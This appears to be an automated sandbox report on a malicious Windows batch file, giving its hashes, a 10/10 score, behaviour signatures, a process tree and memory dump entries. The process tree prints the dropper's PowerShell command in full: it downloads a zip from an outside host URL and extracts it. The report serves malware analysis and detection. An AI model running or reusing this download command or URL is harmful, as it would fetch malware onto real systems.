4225bf32e2cebf0ab89c0bd69f75cc130004d216adeda6d72a49a990de021edd

Analysis

max time kernel
31s
max time network
35s
platform
windows7_x64
resource
win7-20230703-en
resource tags

arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
submitted
04-07-2023 14:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tesybat.bat
Size

700B
MD5

1f82d80f3da0453ed5f2dd96ac37ce37
SHA1

ab45855c093b7309f448921379f534058aa27b7c
SHA256

4225bf32e2cebf0ab89c0bd69f75cc130004d216adeda6d72a49a990de021edd
SHA512

3a780483beb4492cad9e9d20c792ff961a8189ff40bdae91592d96489ff1b216fcbcf287169274bf7bcfcb62c65b4668e90e8ab067b06a83c414b10f7e3de6f7

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.nest.rip/uploads/ad49a3aa-05de-4f83-b1af-f0e6ee05e9f3.zip

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	1512	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1512	powershell.exe
268	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	268	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 1512	2336	cmd.exe	30
PID 2336 wrote to memory of 1512	2336	cmd.exe	30
PID 2336 wrote to memory of 1512	2336	cmd.exe	30
PID 2336 wrote to memory of 268	2336	cmd.exe	31
PID 2336 wrote to memory of 268	2336	cmd.exe	31
PID 2336 wrote to memory of 268	2336	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tesybat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/ad49a3aa-05de-4f83-b1af-f0e6ee05e9f3.zip', 'test.zip')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Expand-Archive -Path 'test.zip' -DestinationPath '.'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:268

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
bb544512c3fd26528469850661ab738e

SHA1
cbb02d25a38e78839649e2752158244302acf3a7

SHA256
415559850170c6e7b3a18dd95978956ed2b611e7708b831e2e8b039b6eb71b84

SHA512
50d023be2ad6d71f434bba933d85892c46aa8309a3ca148ed626a8dce6b0a46d2d093c4c201ab9e7972161346a44dc19690d4e01c0f55eab6b351534192eaa37

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L86WETGFUIU4UCC7ROR2.temp

Filesize
7KB

MD5
bb544512c3fd26528469850661ab738e

SHA1
cbb02d25a38e78839649e2752158244302acf3a7

SHA256
415559850170c6e7b3a18dd95978956ed2b611e7708b831e2e8b039b6eb71b84

SHA512
50d023be2ad6d71f434bba933d85892c46aa8309a3ca148ed626a8dce6b0a46d2d093c4c201ab9e7972161346a44dc19690d4e01c0f55eab6b351534192eaa37

Download Submit
memory/268-68-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

Filesize
2.9MB

Download
memory/268-69-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

Filesize
32KB

Download
memory/268-71-0x000000000278B000-0x00000000027C2000-memory.dmp

Filesize
220KB

Download
memory/268-70-0x0000000002784000-0x0000000002787000-memory.dmp

Filesize
12KB

Download
memory/1512-58-0x000000001B0B0000-0x000000001B392000-memory.dmp

Filesize
2.9MB

Download
memory/1512-59-0x0000000002370000-0x0000000002378000-memory.dmp

Filesize
32KB

Download
memory/1512-60-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/1512-61-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/1512-62-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download